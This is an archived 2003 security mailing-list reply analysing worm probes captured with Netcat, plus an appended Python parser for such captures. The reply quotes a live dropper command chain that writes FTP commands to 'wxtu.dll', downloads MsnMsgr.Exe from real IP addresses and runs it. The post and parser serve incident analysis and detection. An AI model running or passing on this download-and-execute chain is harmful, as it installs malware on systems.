Security Incidents mailing list archives

Re: New Worm or Worm Variant?


From: Harlan Carvey <keydet89 () yahoo com>
Date: Thu, 11 Dec 2003 05:41:00 -0800 (PST)


> I've been seeing a jump in 20168/tcp scans over the
> past week or so.  This port is commonly associated
> with the Lovegate worm.

Not always a good idea to go w/ default ports.  It may
be a way to start, but most malware is configurable,
and new stuff is coming out all the time.

> I recently set up a port
> listener using Netcat to capture
> any output from probes against a couple of my
> systems.  Shown below are the results:

Good man!  It's about time someone decided to do that
without having to be asked...

> echo open 211.26.130.118 >> wxtu.dll & echo USER
> noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo
> binary >> wxtu.dll & echo get MsnMsgr.Exe >>
> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll
> & del wxtu.dll & start MsnMsgr.Exe
>
> echo open 211.26.132.172 >> wxtu.dll & echo USER
> noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo
> binary >> wxtu.dll & echo get MsnMsgr.Exe >>
> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll
> & del wxtu.dll & start MsnMsgr.Exe

> At first glance it looks like some sort of
> non-interactive FTP session to download an exploit
> (MsnMsgr.Exe),

At first glance?  That's exactly what it is!

> but Googling for wxtu.dll came up
> empty (so this could be anything from a real .dll to
> a renamed executable in my mind).

That's b/c wxtu.dll is nothing but a text file in this
case.  The 'echo' statements and redirection are used
to create the DLL...it's not surprising (shouldn't be)
that you're not seeing references to it on Google. 
This is similar to the IRC bots a bit ago...each new
variation of the bot had different scripts and
different names, but they all used mIRC32.exe and
hidewndw.exe at their core.  Each variation simply
changed the names of the executables.  I took a look
at the RussianTopz bot, which used statistics.exe and
Teamscan32.exe, respectively.
 
> 1) Has anyone run across anything like this before?
> This looks like something automated to me.

That's b/c it *is* automated.
 
> 2) Any theories on wxtu.dll?  Since I can't get a
> hold of the malware to analyze it, I'm really
> guessing at this point.

The DLL is just an FTP script file.  It's not
necessarily "malware" in and of itself.  To be honest,
the commands you captured (thanks, again, btw) are
very clear on that.

> MsnMsgr.Exe seems to be the
> exploit itself, and it appears to be using something
> like FTPCOM to do a non-interactive FTP session, but
> wxtu.dll could be anything from a real .dll file to
> a renamed executable.  Ideas?

Yeah, you're WAY off base.  While MsnMsgr.exe *is* the
malware, the DLL you keep looking at is *NOT* a real
DLL and is *NOT* executable.  It's very, very clear
from what you've sent that the DLL is nothing more
than a script file, filled with FTP commands.  Go to
the online help on your system and look up FTP.

BTW...what the *hell* is FTPCOM???  ;-)

HTH,

Harlan
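As an added example (not part of the list post above), here is a small Python parser that recognises the "echo ... >> file & ftp -n -s:file" dropper pattern discussed in the thread and pulls out what a responder wants to log: the FTP server, the credentials, the fetched binary and the "DLL" that is really a script. The sample capture is constructed, modelled on the one in the post, with a documentation-range IP in place of the real one.

```python
import re
from dataclasses import dataclass, field

# One "echo <ftp command> >> <script file>" fragment of the command chain
ECHO_RE = re.compile(r'echo\s+(?P<cmd>[^&>]+?)\s*>>\s*(?P<script>\S+)', re.I)
# The non-interactive ftp.exe invocation that replays the script file
FTP_RE = re.compile(r'\bftp\s+-n\s+-s:(?P<script>\S+)', re.I)


@dataclass
class FtpDropper:
    script: str                     # text file built with echo, e.g. wxtu.dll
    host: str = ""                  # argument of the "open" line
    user: str = ""                  # argument of the "user" line
    password: str = ""              # the script line that follows "user"
    fetched: list = field(default_factory=list)   # files pulled with "get"
    started: list = field(default_factory=list)   # files launched with "start"


def parse_capture(text: str):
    """Return an FtpDropper if the captured chain builds an FTP script via
    echo redirects and runs it with 'ftp -n -s:', otherwise None."""
    flat = " ".join(text.split())   # re-join a line-wrapped capture
    m = FTP_RE.search(flat)
    if not m:
        return None
    d = FtpDropper(script=m.group("script"))
    # Reconstruct the script: only echo lines redirected into that file
    lines = [e.group("cmd").strip() for e in ECHO_RE.finditer(flat)
             if e.group("script") == d.script]
    # Interpret it the way ftp.exe reads a script with -n (no auto-login):
    # "user NAME" is answered by the next line, which is the password.
    for i, line in enumerate(lines):
        parts = line.split()
        kw = parts[0].lower()
        if kw == "open" and len(parts) > 1:
            d.host = parts[1]
        elif kw == "user" and len(parts) > 1:
            d.user = parts[1]
            if i + 1 < len(lines):
                d.password = lines[i + 1]
        elif kw == "get" and len(parts) > 1:
            d.fetched.append(parts[1])
    d.started = re.findall(r'\bstart\s+(\S+)', flat, re.I)
    return d


# Constructed sample in the shape of the Netcat capture from the post
SAMPLE_CAPTURE = """echo open 203.0.113.5 >> wxtu.dll & echo USER
noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo
binary >> wxtu.dll & echo get MsnMsgr.Exe >>
wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll
& del wxtu.dll & start MsnMsgr.Exe"""
```

Feeding the raw listener output to parse_capture() gives the host, account and dropped filename as structured fields, which is more useful for a blocklist or a signature than grepping for the script name.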
